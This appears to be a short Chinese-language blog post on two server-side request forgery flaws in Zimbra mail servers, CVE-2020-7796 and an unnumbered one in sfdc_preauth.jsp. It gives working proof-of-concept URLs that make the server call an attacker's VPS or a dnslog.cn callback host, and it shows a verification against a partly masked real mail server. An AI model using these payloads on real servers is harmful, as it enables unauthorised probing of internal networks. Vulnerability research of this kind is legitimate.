zimbra SSRF漏洞

浏览 194 扫码分享 2023-04-01 08:00:57

1.CVE-2020-7796
2.SSRF漏洞2（无CVE编号）

1.CVE-2020-7796

该SSRF漏洞出现的脚本位于/zimlet/com_zimbra_webex/httpPost.jsp，不是所有的zimbra邮件服务器都开启了zimlet，因此CVE-2020-7796并不是通用的，POC代码如下：

/zimlet/com_zimbra_webex/httpPost.jsp?companyId=VPS的IP:port#

2.SSRF漏洞2（无CVE编号）

POC代码如下：

/service/error/sfdc_preauth.jsp?session=s&userid=1&server=vps的ip:port%23.salesforce.com/

验证：
https://xxx/service/error/sfdc_preauth.jsp?session=s&userid=1&server=https://zmftc4.dnslog.cn%23.salesforce.com/
使用dnslog作为验证SSRF，dnslog地址zmftc4.dnslog.cn
访问该链接：
https://xxxxx/service/error/sfdc_preauth.jsp?session=s&userid=1&server=https://zmftc4.dnslog.cn%23.salesforce.com/

再查看dnslog

12x.xxx.xxx.24为mail.xxxx.com的ip地址，由该IP发起的请求，说明存在SSRF漏洞

若有收获，就点个赞吧

上一篇:

下一篇:

让时间为你证明

展开/收起文章目录